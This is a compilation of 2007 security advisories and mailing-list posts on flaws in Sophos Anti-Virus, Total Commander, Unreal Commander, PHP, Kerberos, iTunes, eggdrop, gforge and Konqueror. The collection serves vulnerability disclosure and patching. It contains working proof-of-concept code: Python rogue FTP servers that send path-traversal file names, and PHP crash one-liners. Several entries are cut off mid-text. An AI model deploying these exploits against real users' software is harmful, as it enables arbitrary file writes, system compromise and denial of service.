Sophos Anti-Virus 6.5.4 Vulnerability
NameCross Site Scripting Vulnerability in Sophos Anti-Virus Systems AffectedSophos Anti-Virus, version 6.5.4 R2 SeverityMedium CategoryCross Site Scripting Author Context Information Security Ltd Advisory6th September 2007 Description --- A ZIP archive containing a virus signature with a malformed file name will cause a Cross Site Scripting vulnerability to be triggered from within the Sophos Anti Virus client. Analysis When Sophos anti-virus scans a specially crafted ZIP archive containing a XSS attack string, it will internally log the string. When this information is accessed via the Sophos client (SavMain.exe) the XSS attack string is unencoded. When the print function is called, the application can be used to run arbitrary code on the target machine from an external attackers submitted file. Technologies Affected - Sophos Anti-Virus, version 6.5.4 R2 Resolution -- Update to version 6.5.8 or 7.0. Vendor Response --- Sophos have patched this issue in version 7.01. CVE Details --- This issue has been provisionally assigned a CVE candidate number of CVE-2007-4512 Disclosure Timeline --- 18 April 2007 Initial Discovery and vendor notification 19 April 2007 Vendor Response 21 August 2007 Second Vendor Response 6 September 2007 - Coordinated Public Release Credits Michael Jordon of Context Information Security Ltd About Context Information Security -- Context Information Security Limited is a specialist information security consultancy based in London and Frankfurt. Context promotes the holistic approach to information security and helps clients to identify, assess and control their exposure to risk within the fields of IT, telephony and physical security. Context employs experienced information security professionals who are subject-matter experts in their various technical specialisms. Context works extensively within the finance, legal, defence and government sectors, delivering high-end information security projects to organisations for which security is a priority. Web:www.contextis.co.uk Email: [EMAIL PROTECTED] About Sophos Sophos is a world leader in IT security and control solutions purpose-built for business, education, government organizations and service providers. Our reliably engineered, easy-to-operate products protect over 100 million users in more than 150 countries from viruses, spyware, adware, Trojans, intrusion, spam, policy abuse, and uncontrolled network access.
[HISPASEC] 2K7SEPT6 Total Commander 7.01 Remote FTP Client Directory Traversal
HISPASEC
Security Advisory
http://blog.hispasec.com/lab/
Name : 2K7SEPT6 Total Commander 7.01 Remote FTP Client
Directory Traversal
Class: Remote Directory Traversal
Threat level : HIGH
Discovered : 2007-08-25
Published: 2007-09-06
Credit : Gynvael Coldwind
Vulnerable : 7.01 and prior
== Abstract ==
Christian Ghislers Total Commander is a popular Windows file explorer with a
built-in support for FTP protocol.
Total Commander is vulnerable to remote file name spoofing leading to local
directory traversal while downloading a file from a malformed FTP server.
Successful exploitation may lead to a full scale system compromise.
== Details ==
The FTP feature fails to correctly check the name of a file that is to be
downloaded. This filename can contain backslashes and dots, and these dots and
backslashes will be shown in the Download (Copy used on a file on the FTP
server) window, and so, the file will be downloaded to a location chosen by the
attacker.
To make it worse, Total Commander strips path from the listing window, so that
these backslashes and dots are not shown in the location window.
How this is done:
1. A Total Commander user connects to an FTP server.
2. The Total Commander starts the FTP procedure:
USER something
PASS something
SYST
FEAT
PWD
TYPE A
PASV
LIST
3. The FTP send the following file list to the Total Commander:
-rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28
st\..\..\..\..\..\BackSlashPoC
4. The Total Commander will strip the backslashes, and will show only
BackSlashPoC in the lister window.a
5. The user presses F5 (copy) on the file and Enter. The dots and backslashes
will be shown there, but the uses in most cases will not notice it (this has
been tested). If the file is located inside a directory or was selected for
batch copying the user will never be informed about the additional path
traversal.
6. The file is downloaded to the location
UserChosen\st\..\..\..\..\..\..BackSlashPoC
Since more then enough \..\..\ will just bring the path to the disk root, the
attacker can choose any location on the disk to write the file to. The file can
for example overwrite a critical system file, or create a file in the Autostart
folder.
See Proof of Concept exploit at the bottom of this advisory.
== Vendor status and solution ==
The vendor has been informed and has released a new version (7.02) with this
issue being fixed.
It is advised to upgrade Total Commander to the newest version availible.
== Proof of Concept ==
# python localhost ftp server
import socket
TransferSock = 0
def sendDirList (sock):
(DataSock, Address) = TransferSock.accept()
print sendDirList: TransferSock accepted a connection
sock.send(150 Opening ASCII mode data connection for file list\r\n);
DataSock.send(-rwxr-xr-x 2 ftp ftp 4096 Aug 1
02:28 st\\..\\..\\..\\..\\..\\BackSlashPoC\n);
DataSock.close()
sock.send(226 Transfer complete.\r\n);
print sendDirList: Transfer complete\r\n
def sendFile (sock):
(DataSock, Address) = TransferSock.accept()
print sendDirList: TransferSock accepted a connection
sock.send(150 Opening BINARY mode data connection for sth (5 bytes)\r\n);
DataSock.send(Proof of Concept - Remote FTP Client directory
traversal vulnerability (G.C. - Hispasec));
DataSock.close()
sock.send(226 Transfer complete.\r\n);
print sendDirList: Transfer complete\r\n
def handleUSER (sock, cmd, argz): sock.send(331 Password required for
user\r\n)
def handlePASS (sock, cmd, argz): sock.send(230 User logged in.\r\n)
def handleSYST (sock, cmd, argz): sock.send(215 UNIX Type: L8\r\n)
def handleFEAT (sock, cmd, argz): sock.send(211-Features:\r\n
MDTM\r\n REST STREAM\r\n211 End\r\n);
def handleTYPE (sock, cmd, argz): sock.send(200 Type set to + argz + \r\n);
def handlePASV (sock, cmd, argz): sock.send(227 Entering Passive Mode
(127,0,0,1,10,10)\r\n);
def handlePWD (sock, cmd, argz): sock.send(257 \/ProofOfConcept\ is
current directory.\r\n)
def handleLIST (sock, cmd, argz): sendDirList(sock)
def handleQUIT (sock, cmd, argz):
sock.send(Bye.\r\n)
sock.close()
def handleRETR (sock, cmd, argz):
if argz == /:
sendDirList(sock)
else:
sendFile(sock)
def unknown (sock, cmd, argz): sock.send(550 + cmd + : Operation
not permitted\r\n)
handlers = {
'USER': handleUSER,
'PASS': handlePASS,
'SYST': handleSYST,
'FEAT': handleFEAT,
'TYPE': handleTYPE,
'PASV': handlePASV,
'PWD': handlePWD,
'LIST': handleLIST,
'QUIT': handleQUIT,
'RETR': handleRETR
}
ControlSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ControlSock.bind((127.0.0.1, 2021))
ControlSock.listen(1)
TransferSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TransferSock.bind((127.0.0.1, 10 * 256 + 10))
TransferSock.listen(10)
# Control Sock loop
(ClientSock, Address) = ControlSock.accept()
ClientSock.send(220 PoCFTPD 1.2.3.4 Server ready.\r\n);
end = 0
while not end:
cmd = ClientSock.recv(1024)
print
Re: PHP 5.2.3 glob() denial of service
Hi there, I haven't used PHP in a long while and I am by no means an expert. I think that this type of attack is mitigated by the fact that PHP doesn't support threading (more accurately, PHP modules don't support threading) - it isn't thread-safe. Thus, if you are running PHP as CGI or even a module within Apache, it will only crash the PHP CGI or the Apache child process (since you have to use prefork)... These are serious bugs to be sure, but given the above, in the real world I don't think that this could cause too many problems. Jon On 4 Sep 2007 21:05:51 -, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Application: PHP 5.2.3 Web Site: http://php.net Platform: unix Bug: denial of service fonction: glob() special condition:default php memory-limit value === 1) Introduction 2) Bug 3) Proof of concept 4) greets 5) Credits === 1) Introduction === PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. == 2) Bug == glob() is vulnerable to a denial of service = 3)Proof of concept = Proof of concept example : ?php glob(str_repeat(A, 9638013)); ? result: (gdb) run ./3.php Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1215031616 (LWP 11156)] 0xb79d3a5a in globfree () from /lib/tls/i686/cmov/libc.so.6 4)Greets Ivanlef0u,Deimos,benji,soh ,and everyones on worldnet: #futurezone #nibbles = 5)Credits = Laurent gaffie contact : [EMAIL PROTECTED] stay tuned, site comming soon
[HISPASEC] 2K7SEPT6 X-Diesel Unreal Commander v0.92 (build 573) multiple FTP-based vulnerabilities
HISPASEC
Security Advisory
http://blog.hispasec.com/lab/
Name : 2K7SEPT6 X-Diesel Unreal Commander v0.92 (build 573)
multiple FTP-based vulnerabilities
Class: Remote directory traversal, Remote DoS
Threat level : HIGH
Discovered : 2007-09-06
Published: 2007-08-24
Credit : Gynvael Coldwind
Vulnerable : 0.92 (build 573), 0.92 (build 565), prior also may be affected
== Abstract ==
Unreal Commander is an award winning freeware file manager for Windows
98/ME/2000/XP/2003/Vista. The application support multiple archive
formats, has a built-in ftp client, and other features.
Unreal Commander fails to correctly handle malformed file name while downloading
a remote file from a malformed FTP server to a local hard driver. This allows an
attacker to perform a directory traversal attack. Successful exploitation may
lead to a full scale system compromise.
Unreal Commander also fails to correctly handle FTP reponses. This can lead to
the application entering an infinite loop, denying service to the legitimate
user.
== Details ==
1. Remote FTP Directory Traversal
The FTP feature fails to correctly check the name of a file that is to be
downloaded. This filename can contain backslashes and dots, and these dots and
backslashes will be used as a part of a file name.
An example file list sent from the FTP server can look like this:
-rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28
st\..\..\..\..\..\BackSlashPoC
When the user chooses to download the file (or a directory in which this file
exists), the Unreal Commander will try to create the file on a local harddrive
using the dots and backslashes as a part of a name.
Since more then enough \..\..\ will just bring the path to the disk root, the
attacker can choose any location on the disk to write the file to. The file can
for example overwrite a critical system file, or create a file in the Autostart
folder.
See Proof of Concept exploit at the bottom of this advisory.
2. Remote FTP DoS
When connecting to a malformed FTP, the Unreal Commander sends a CWD /
command. If the malformed FTP replies with a 550 CWD Operation not permitted
message, the Unreal Commander tries to resend the command. The loop continues
until the remote FTP answers with a message about operation being successful.
If the remote FTP disconnects while Unreal Commander is still in the CWD loop,
the Unreal Commander will continue to remain in the loop.
The Unreal Commander does not react to Cancel/ALT+F4/ESC commands from the user,
the only way to exit the loop is to terminate the application.
See Proof of Concept exploit at the bottom of this advisory.
== Vendor status and solution ==
The vendor has been informed, but has not yet released a proper patch.
The solution is to check the file names of each file being downloaded from a
remote unknown FTP.
== Proof of Concept - Remote FTP Directory Traversal ==
# python FTP
# by Gynvael Coldwind
import socket
TransferSock = 0
def sendDirList (sock):
(DataSock, Address) = TransferSock.accept()
print sendDirList: TransferSock accepted a connection
sock.send(150 Opening ASCII mode data connection for file list\r\n);
DataSock.send(-rwxr-xr-x 2 ftp ftp 4096 Aug 1
02:28 st\\..\\..\\..\\..\\..\\..\\BackSlashPoC\n);
DataSock.close()
sock.send(226 Transfer complete.\r\n);
print sendDirList: Transfer complete\r\n
def sendFile (sock):
(DataSock, Address) = TransferSock.accept()
print sendDirList: TransferSock accepted a connection
sock.send(150 Opening BINARY mode data connection for sth (5 bytes)\r\n);
DataSock.send(Proof of Concept - Remote FTP Client directory
traversal vulnerability (G.C. - Hispasec));
DataSock.close()
sock.send(226 Transfer complete.\r\n);
print sendDirList: Transfer complete\r\n
def handleUSER (sock, cmd, argz): sock.send(331 Password required for
user\r\n)
def handlePASS (sock, cmd, argz): sock.send(230 User logged in.\r\n)
def handleSYST (sock, cmd, argz): sock.send(215 UNIX Type: L8\r\n)
def handleFEAT (sock, cmd, argz): sock.send(211-Features:\r\n
MDTM\r\n REST STREAM\r\n211 End\r\n);
def handleTYPE (sock, cmd, argz): sock.send(200 Type set to + argz + \r\n);
def handlePASV (sock, cmd, argz): sock.send(227 Entering Passive Mode
(127,0,0,1,10,10)\r\n);
def handlePWD (sock, cmd, argz): sock.send(257 \/\ is current
directory.\r\n)
def handleCWD (sock, cmd, argz): sock.send(250 Requested file action
okay, completed.\r\n)
def handleLIST (sock, cmd, argz): sendDirList(sock)
def handleQUIT (sock, cmd, argz):
sock.send(Bye.\r\n)
sock.close()
def handleRETR (sock, cmd, argz):
if argz == /:
sendDirList(sock)
else:
sendFile(sock)
def unknown (sock, cmd, argz): sock.send(550 + cmd + : Operation
not permitted\r\n)
handlers = {
'USER': handleUSER,
'PASS': handlePASS,
'SYST': handleSYST,
'FEAT': handleFEAT,
'TYPE': handleTYPE,
'PASV': handlePASV,
'PWD': handlePWD,
'CWD': handleCWD,
'LIST': handleLIST,
PHP = 5.2.4 multiple Iconv functions denial of service
Application: PHP =5.2.4 Web Site: http://php.net Platform: unix Bug: denial of service function: iconv(),iconv_strlen(),iconv_mime_decode(),iconv_mime_decode_headers() special condition: default php-memory-limit --- 1) Introduction 2) Bug 3) Proof of concept 4) Greets 5) Credits === 1) Introduction === PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. == 2) Bug == multiple Iconv funtions are vulnerable to a denial of service. = 3)Proof of concept = /* debian:~# php -v PHP 5.2.4 (cli) (built: Aug 31 2007 16:39:15) Copyright (c) 1997-2007 The PHP Group Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies */ Proof of concept example : 1) iconv() ?php $a = str_repeat(/, 4199000); iconv(1, $a, 1); ? (gdb)run 1.php Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1217608000 (LWP 29444)] 0xb76ed3e5 in iconv_close () from /lib/tls/libc.so.6 2) iconv_mime_decode_headers() ?php $a = str_repeat(/, 2991370); iconv_mime_decode_headers(0, 1, $a); ? (gdb) run 2.php Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1216760128 (LWP 29475)] 0xb78a69ef in _dl_open () from /lib/tls/libc.so.6 3)iconv_mime_decode() (gdb) run 3.php ?php $a = str_repeat(/, 3799000); iconv_mime_decode(1, 0, $a); ? Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1217227072 (LWP 29518)] 0xb78349ef in _dl_open () from /lib/tls/libc.so.6 4)iconv_strlen() ?php $a = str_repeat(/, 9791999); iconv_strlen(1, $a); ? (gdb) run 4.php Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1216637248 (LWP 29543)] 0xb77d9d1b in iconv_open () from /lib/tls/libc.so.6 4)Greets Ivanlef0u,Deimos,Benji,Berga,Soh,and everyones from worldnet: #futurezone #nibbles = 5)Credits = Laurent gaffie contact : [EMAIL PROTECTED] stay tuned, site comming soon
rPSA-2007-0179-1 krb5 krb5-server krb5-services krb5-test krb5-workstation
rPath Security Advisory: 2007-0179-1 Published: 2007-09-06 Products: rPath Linux 1 Rating: Critical Exposure Level Classification: Remote Root Deterministic Unauthorized Access Updated Versions: krb5=/[EMAIL PROTECTED]:devel//1/1.4.1-7.8-1 krb5-server=/[EMAIL PROTECTED]:devel//1/1.4.1-7.8-1 krb5-services=/[EMAIL PROTECTED]:devel//1/1.4.1-7.8-1 krb5-test=/[EMAIL PROTECTED]:devel//1/1.4.1-7.8-1 krb5-workstation=/[EMAIL PROTECTED]:devel//1/1.4.1-7.8-1 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3999 https://issues.rpath.com/browse/RPL-1696 Description: Previous versions of the krb5 package are vulnerable to an unauthenticated remote arbitrary code execution attack against the kadmind server. rPath Linux systems are not automatically configured with kadmind enabled. Systems configured as kerberos administrative servers are vulnerable. Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
iTunes 7.3.x - Heap overflow in album cover parsing
iSEC Partners Security Advisory - 2007-005-itunes https://www.isecpartners.com iTunes 7.3.x - Heap overflow in album cover parsing Vendor: Apple, Inc. Vendor URL: http://www.apple.com Versions affected: Confirmed in iTunes 7.3.2 Systems Affected: Confirmed on OS X 10.4.10 PPC, Windows XP x86 Severity: High (potential code execution) Author: David Thiel david[at]isecpartners[dot]com Vendor notified: 2007-07-29 Public release: 2007-09-05 Advisory URL: https://www.isecpartners.com/advisories/2007-005-itunes.txt Vendor Advisory URL: http://docs.info.apple.com/article.html?artnum=306404 Summary: A vulnerability exists in iTunes where an attacker can cause a denial of service or code execution via maliciously crafted album cover art embedded in a media file. Details: iTunes 7.3.2 and earlier are vulnerable to a heap overflow when parsing the 'covr' atom of an MP4/AAC file. This atom is normally used for the storage of album cover art. Fix Information: This issue is fixed in iTunes 7.4, available via Software Update or download at http://www.apple.com/itunes/download/. Thanks to: -- The Apple product security team for a timely response to this issue. About iSEC Partners: iSEC Partners is a full-service security consulting firm that provides penetration testing, secure systems development, security education and software design verification, with offices in San Francisco, Seattle, Ewa Beach and Los Angeles. https://www.isecpartners.com [EMAIL PROTECTED]
[ MDKSA-2007:175 ] - Updated eggdrop package fix remote buffer overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:175 http://www.mandriva.com/security/ ___ Package : eggdrop Date: September 6, 2007 Affected: 2007.0, 2007.1, Corporate 3.0 ___ Problem Description: A stack-based buffer overflow in mod/server.mod/servrmsg.c in Eggdrop 1.6.18, and possibly earlier, allows user-assisted, malicious remote IRC servers to execute arbitrary code via a long private message. Updated packages fix this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2807 ___ Updated Packages: Mandriva Linux 2007.0: 42c9df2265dca3aa08ac313581d2f79e 2007.0/i586/eggdrop-1.6.17-3.1mdv2007.0.i586.rpm 0b8dab3bb20fa77b8110fba70c0cf42d 2007.0/SRPMS/eggdrop-1.6.17-3.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: dbe358c197ea69243ea96536814b089c 2007.0/x86_64/eggdrop-1.6.17-3.1mdv2007.0.x86_64.rpm 0b8dab3bb20fa77b8110fba70c0cf42d 2007.0/SRPMS/eggdrop-1.6.17-3.1mdv2007.0.src.rpm Mandriva Linux 2007.1: a56c9816445a5b4967d03d144aade848 2007.1/i586/eggdrop-1.6.17-3.1mdv2007.1.i586.rpm d8eb704c902f6118cec187ec6cd67bae 2007.1/SRPMS/eggdrop-1.6.17-3.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 69824e4cf05c6aaed125d3ce5b035d49 2007.1/x86_64/eggdrop-1.6.17-3.1mdv2007.1.x86_64.rpm d8eb704c902f6118cec187ec6cd67bae 2007.1/SRPMS/eggdrop-1.6.17-3.1mdv2007.1.src.rpm Corporate 3.0: 885019e8d2f6b0cfb9de05156d6e corporate/3.0/i586/eggdrop-1.6.15-3.1.C30mdk.i586.rpm aa1cb17308f08bec5f524d41495e5fc9 corporate/3.0/SRPMS/eggdrop-1.6.15-3.1.C30mdk.src.rpm Corporate 3.0/X86_64: 6913fb0a2f783d2614f34883e40d7664 corporate/3.0/x86_64/eggdrop-1.6.15-3.1.C30mdk.x86_64.rpm aa1cb17308f08bec5f524d41495e5fc9 corporate/3.0/SRPMS/eggdrop-1.6.15-3.1.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFG4DbKmqjQ0CJFipgRAm4GAKDFKweH2B/+a6/RA3QCwzpucyBUcgCfR0Ut pDyeJQ70WsKtb2JG83pfSqc= =ZpMx -END PGP SIGNATURE-
[SECURITY] [DSA 1367-2] New krb5 packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1367-2[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff September 6th, 2007 http://www.debian.org/security/faq - -- Package: krb5 Vulnerability : buffer overflow Problem-Type : remote Debian-specific: no CVE ID : CVE-2007-3999 It was discovered that a buffer overflow of the RPC library of the MIT Kerberos reference implementation allows the execution of arbitrary code. The original patch from DSA-1367-1 didn't address the problem fully. This update delivers an updated fix. The oldstable distribution (sarge) is not affected by this problem. For the stable distribution (etch) this problem has been fixed in version 1.4.4-7etch4. For the unstable distribution (sid) this problem will be fixed soon. We recommend that you upgrade your Kerberos packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/k/krb5/krb5_1.4.4-7etch4.dsc Size/MD5 checksum: 876 77cfeed4304b589e90db0651c8350d92 http://security.debian.org/pool/updates/main/k/krb5/krb5_1.4.4-7etch4.diff.gz Size/MD5 checksum: 1589790 dab0c692e09564434a645b13646e5fdd http://security.debian.org/pool/updates/main/k/krb5/krb5_1.4.4.orig.tar.gz Size/MD5 checksum: 11017910 a675e5953bb8a29b5c6eb6f4ab0bb32a Architecture independent components: http://security.debian.org/pool/updates/main/k/krb5/krb5-doc_1.4.4-7etch4_all.deb Size/MD5 checksum: 1811994 3ff6393e824c3416fd36a8e4ad245d42 Alpha architecture: http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch4_alpha.deb Size/MD5 checksum:89472 d43903519a6ec1d6ff2dbd6bbececf36 http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch4_alpha.deb Size/MD5 checksum: 245448 b6d7648b9c4827e6c4035695877e200c http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch4_alpha.deb Size/MD5 checksum:65734 829a6d48898b98cc76e85dab102750e1 http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch4_alpha.deb Size/MD5 checksum: 154880 fe3448535d05825b20833b94580074d1 http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch4_alpha.deb Size/MD5 checksum:91454 3b744955a52022455e1bb813705a860f http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch4_alpha.deb Size/MD5 checksum:75942 46c14d351ed56c88960d2bd3a20779b4 http://security.debian.org/pool/updates/main/k/krb5/krb5-user_1.4.4-7etch4_alpha.deb Size/MD5 checksum: 135934 3ab40ecc6dd191f45ae03a8582945932 http://security.debian.org/pool/updates/main/k/krb5/libkadm55_1.4.4-7etch4_alpha.deb Size/MD5 checksum: 216080 66abe9f8c7503b6681fa29cf59974d0f http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dbg_1.4.4-7etch4_alpha.deb Size/MD5 checksum: 1087408 240be01391324069e9af19c8117af443 http://security.debian.org/pool/updates/main/k/krb5/libkrb5-dev_1.4.4-7etch4_alpha.deb Size/MD5 checksum: 1016762 291da6531e7fc24205be3bd493d1 http://security.debian.org/pool/updates/main/k/krb5/libkrb53_1.4.4-7etch4_alpha.deb Size/MD5 checksum: 460840 e648f5f29d66b15eddceb176570440ab AMD64 architecture: http://security.debian.org/pool/updates/main/k/krb5/krb5-admin-server_1.4.4-7etch4_amd64.deb Size/MD5 checksum:83740 05058bd16775b4fe89e47afb14058ea7 http://security.debian.org/pool/updates/main/k/krb5/krb5-clients_1.4.4-7etch4_amd64.deb Size/MD5 checksum: 221734 edc3f9d1a135e39aafbc16e918ee8a7b http://security.debian.org/pool/updates/main/k/krb5/krb5-ftpd_1.4.4-7etch4_amd64.deb Size/MD5 checksum:61952 956dd0cfb2dd16f2524375cc3f357044 http://security.debian.org/pool/updates/main/k/krb5/krb5-kdc_1.4.4-7etch4_amd64.deb Size/MD5 checksum: 142098 29af8744c756aefa5c77f19c3c5a332e http://security.debian.org/pool/updates/main/k/krb5/krb5-rsh-server_1.4.4-7etch4_amd64.deb Size/MD5 checksum:86538 a60480f71dd39c72eb51cb404802dea3 http://security.debian.org/pool/updates/main/k/krb5/krb5-telnetd_1.4.4-7etch4_amd64.deb Size/MD5 checksum:
[SECURITY] [DSA 1369-1] New gforge packages fix SQL injection
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1369-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff September 6th, 2007 http://www.debian.org/security/faq - -- Package: gforge Vulnerability : missing input sanitising Problem-Type : remote Debian-specific: no CVE ID : CVE-2007-3913 Sumit I. Siddharth discovered that Gforge, a collaborative development tool performs insufficient input sanitising, which allows SQL injection. For the oldstable distribution (sarge) this problem has been fixed in version 3.1-31sarge2. For the stable distribution (etch) this problem has been fixed in version 4.5.14-22etch1. For the unstable distribution (sid) this problem will be fixed soon. We recommend that you upgrade your gforge package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/g/gforge/gforge_3.1-31sarge2.dsc Size/MD5 checksum: 868 6baa9978f8ff39cae8e37535e617f6ba http://security.debian.org/pool/updates/main/g/gforge/gforge_3.1-31sarge2.diff.gz Size/MD5 checksum: 297258 e0f0ef2728d4649743b4ac034f899636 http://security.debian.org/pool/updates/main/g/gforge/gforge_3.1.orig.tar.gz Size/MD5 checksum: 1409879 c723b3a9efc016fd5449c4765d5de29c Architecture independent components: http://security.debian.org/pool/updates/main/g/gforge/gforge-common_3.1-31sarge2_all.deb Size/MD5 checksum:93644 a7809f932f269fc22e36f5623590c6c9 http://security.debian.org/pool/updates/main/g/gforge/gforge-cvs_3.1-31sarge2_all.deb Size/MD5 checksum:98972 aa4610876b4e27b53369f0453ecaa6ca http://security.debian.org/pool/updates/main/g/gforge/gforge-db-postgresql_3.1-31sarge2_all.deb Size/MD5 checksum: 148118 5a69c6c150bb5a56420ddd92dec031e1 http://security.debian.org/pool/updates/main/g/gforge/gforge-dns-bind9_3.1-31sarge2_all.deb Size/MD5 checksum:72242 7ed71adf708785818e9115052af661ca http://security.debian.org/pool/updates/main/g/gforge/gforge-ftp-proftpd_3.1-31sarge2_all.deb Size/MD5 checksum:59642 35f6d7170cb3b192c83f9fbee0effcec http://security.debian.org/pool/updates/main/g/gforge/gforge-ldap-openldap_3.1-31sarge2_all.deb Size/MD5 checksum:70546 cbb7cbaa587229ce51ef878a531c1a18 http://security.debian.org/pool/updates/main/g/gforge/gforge-lists-mailman_3.1-31sarge2_all.deb Size/MD5 checksum:58032 984c0cf8b748e5e128c4a04391a2a9bb http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-exim4_3.1-31sarge2_all.deb Size/MD5 checksum:64934 b2541fbb6077be81f66474f50ca28171 http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-exim_3.1-31sarge2_all.deb Size/MD5 checksum:64470 b5a67eddf626e7956982543f1bedf208 http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-postfix_3.1-31sarge2_all.deb Size/MD5 checksum:64568 3b419356e44b78b094c9080e266deda2 http://security.debian.org/pool/updates/main/g/gforge/gforge-shell-ldap_3.1-31sarge2_all.deb Size/MD5 checksum:60772 887c0770c32d6b2395d25b4a193629fb http://security.debian.org/pool/updates/main/g/gforge/gforge-sourceforge-transition_3.1-31sarge2_all.deb Size/MD5 checksum:59114 b68df2ff172ea2994ad9e52d60083ced http://security.debian.org/pool/updates/main/g/gforge/gforge-web-apache_3.1-31sarge2_all.deb Size/MD5 checksum: 1107780 3de84f6c70eccdcf06d64148e55a9427 http://security.debian.org/pool/updates/main/g/gforge/gforge_3.1-31sarge2_all.deb Size/MD5 checksum:56164 c6abb5b1dbd072255c21513f6144b4d4 http://security.debian.org/pool/updates/main/g/gforge/sourceforge_3.1-31sarge2_all.deb Size/MD5 checksum:55582 ae4524ebd3ac974c1e14793f12514983 Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14-22etch1.dsc Size/MD5 checksum: 950 7088b49f742f8203cc689f2bcfbf14b9 http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14-22etch1.diff.gz Size/MD5 checksum: 194896 c95813e44cd904fccfba04cad5b94fd7
[ MDKSA-2007:176 ] - Updated kdebase and kdelibs packages fix location bar spoofing issues
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:176 http://www.mandriva.com/security/ ___ Package : konqueror Date: September 6, 2007 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0 ___ Problem Description: konqueror/konq_combo.cc in Konqueror 3.5.7 allows remote attackers to spoof the data: URI scheme in the address bar via a long URI with trailing whitespace, which prevents the beginning of the URI from being displayed. (CVE-2007-3820) KDE Konqueror 3.5.7 allows remote attackers to spoof the URL address bar by calling setInterval with a small interval and changing the window.location property. (CVE-2007-4224) Visual truncation vulnerability in KDE Konqueror 3.5.7 allows remote attackers to spoof the URL address bar via an http URI with a large amount of whitespace in the user/password portion. (CVE-2007-4225) Updated packages fix these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3820 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4224 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4225 ___ Updated Packages: Mandriva Linux 2007.0: dba4b66e6d9c05146cbd25b342560c0e 2007.0/i586/kdebase-3.5.4-35.4mdv2007.0.i586.rpm 84129cc9a6094fcb86d7fed04eb919dc 2007.0/i586/kdebase-common-3.5.4-35.4mdv2007.0.i586.rpm 16c09facd07da14e858f841c0c7a98a9 2007.0/i586/kdebase-kate-3.5.4-35.4mdv2007.0.i586.rpm f6e7bbd6463eeb02845b7cfb74a3398c 2007.0/i586/kdebase-kdeprintfax-3.5.4-35.4mdv2007.0.i586.rpm 209d0fdf46670f17d8f71351aa890ecf 2007.0/i586/kdebase-kdm-3.5.4-35.4mdv2007.0.i586.rpm 7d91580c285ca605918090ff8aa7f62a 2007.0/i586/kdebase-kmenuedit-3.5.4-35.4mdv2007.0.i586.rpm 8f3de29b87818157f8cce9ebe6dc7ce9 2007.0/i586/kdebase-konsole-3.5.4-35.4mdv2007.0.i586.rpm 9205eb1e156034da0bc2fc24b9cfdac7 2007.0/i586/kdebase-nsplugins-3.5.4-35.4mdv2007.0.i586.rpm 85d82f838ac9f8d445a934fb861c1675 2007.0/i586/kdebase-progs-3.5.4-35.4mdv2007.0.i586.rpm 54b949917bbd6f2e56f42b827008f75f 